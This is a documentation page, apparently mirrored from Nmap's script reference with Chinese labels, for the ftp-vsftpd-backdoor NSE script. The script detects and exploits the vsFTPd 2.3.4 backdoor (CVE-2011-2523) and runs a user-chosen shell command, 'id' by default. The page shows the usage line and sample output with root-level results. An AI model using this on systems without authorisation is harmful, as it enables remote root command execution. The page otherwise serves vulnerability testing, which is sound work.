File ftp-vsftpd-backdoor

脚本使用类型: portrule
脚本所属分类: exploit, intrusive, malware, vuln
脚本下载地址: http://nmap.org/svn/scripts/ftp-vsftpd-backdoor.nse

User Summary

Tests for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04 (CVE-2011-2523). This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the exploit.cmd or ftp-vsftpd-backdoor.cmd script arguments.

References: * http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html * https://dev.metasploit.com/redmine/projects/framework/repository/revisions/13093 * http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2011-2523

Script Arguments

exploit.cmd

or ftp-vsftpd-backdoor.cmd Command to execute in shell (default is id).

vulns.showall

Example Usage

执行格式

nmap --script ftp-vsftpd-backdoor -p 21 <host>

Script Output

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-vsftpd-backdoor: 
|   VULNERABLE:
|   vsFTPd version 2.3.4 backdoor
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2011-2523  OSVDB:73573
|     Description:
|       vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
|     Disclosure date: 2011-07-03
|     Exploit results:
|       The backdoor was already triggered
|       Shell command: id
|       Results: uid=0(root) gid=0(root) groups=0(root)
|     References:
|       http://osvdb.org/73573
|       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
|       http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|_      https://dev.metasploit.com/redmine/projects/framework/repository/revisions/13093

Requires

• ftp
• nmap
• shortport
• stdnse
• string
• table
• vulns

Author: Daniel Miller

License: VER007 整理 http://www.ver007.com